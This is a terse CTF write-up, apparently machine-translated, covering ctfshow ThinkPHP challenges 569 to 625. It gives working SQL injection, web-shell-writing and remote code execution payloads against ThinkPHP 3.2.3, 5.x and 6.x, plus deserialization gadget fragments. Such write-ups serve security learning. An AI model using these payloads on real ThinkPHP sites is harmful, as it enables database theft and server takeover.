569 URL Pattern

Look up the manual ：URL Pattern · ThinkPHP3.2.3 Full development manual

http://serverName/index.php/ modular / controller / operation 

payload:

 Common mode ：/?m=Admin&c=Login&a=ctfshowLogin
Pathinfo Pattern ：/index.php/Admin/Login/ctfshowLogin
 Compatibility mode ：/?s=/Admin/Login/ctfshowLogin

570 route

Discovery route ：

According to the manual ：

Direct structure ： Direct execution here is not allowed , Perform twice

571 The hacker built the controller back door

Thinkphp3.2.3 Safety development instructions

show Controllable method parameters

572 Log path

Thinkphp3 Log path
/Application/Runtime/Logs/Home/21_04_15.log

573-574 v3.2.3 find sql Inject

/?id[where]=1 and updatexml(1,concat(0x7e,right((select group_concat(flag4s) from flags),22),0x7e),1)

?id=-1) union select 1,group_concat(flag4s),3,4 from flags%23

web575

ThinkPHP 3.2.3 Deserialization &sql Injection vulnerability analysis

First, use the malicious database to read the database information used in the topic

modify exp

"table" => "ctfshow_users where 1=2;select \"<?php eval(\$_POST[0]);?>\" into outfile \"/var/www/html/Y0ng2.php\"#",

576

comment Note injection write shell

Web577

Thinkphp3.2.3 exp Inject

?id[0]=exp&id[1]==-1 union select 1,group_concat(flag4s),3,4 from flags

web578

Variable coverage causes rce

public function index($name='',$from='ctfshow'){
$this->assign($name,$from);
$this->display('index');
}

With that one ThinkPHP 3.2.x RCE almost

Analysis of the assign Two parameters are controllable

Get into display Enter again fetch Method , The title is used php Templates

extract Directly override variables $_content

Then in assign There are two ways , What is passed in is a string or an array

payload:

?name=_content&from=<?php system('cat /fl*');?>
 perhaps 
?name[_content]=<?php phpinfo();?>&from=123

that 3.2.3rce It's in the Think Under the template , This problem is relatively simple in analysis

Web579-610 TP5 rce

Start thinkphp5 rce

payload A lot of

web606

Find some of the first few questions payload That's it , To this question input write invokefunction display Filtered , however Capitalization It bypasses

A new pass :

/?s=index/\think\view\driver\Think/__call&method=display&params[]=<?php system('whoami'); ?>

Generate shell Splice track $content Conduct write Write to cache file

Then read ,include Template cache file

611 TP 5.1 Deserialization

thinkphp 5.1.38 Deserialization RCE

ThinkPHP v5.1.x Deserialization analysis

An Xun Cup | Y0ng The blog of

612-622 5.1 deformation

From this question, we can see Around how to call input Function or param To make an article , Search directly for who calls input, Then analyze it

call param Of ：

'var_pjax'         => '',
$this->hook = ['visible'=>[$this,"isPjax"]];

$this->get = ['y0ng'=>'whoami'];
$this->hook = ['visible'=>[$this,"__get"]];

call input Of ：

$this->hook = ['visible'=>[$this,"request"]];   direct url Just pass the parameters 

$this->route = ['y0ng'=>'whoami'];
$this->hook = ['visible'=>[$this,"route"]];

623-625 TP6 Deserialization

There's a strange place , The title shows 6.0.8 But it should not be possible , So the title version should be wrong , use 6.0.3 That's all right.

ThinkPHP v6.0.x Deserialization vulnerability analysis

use 6.0.9 chain There are two kinds of A direct eval perhaps You can also write files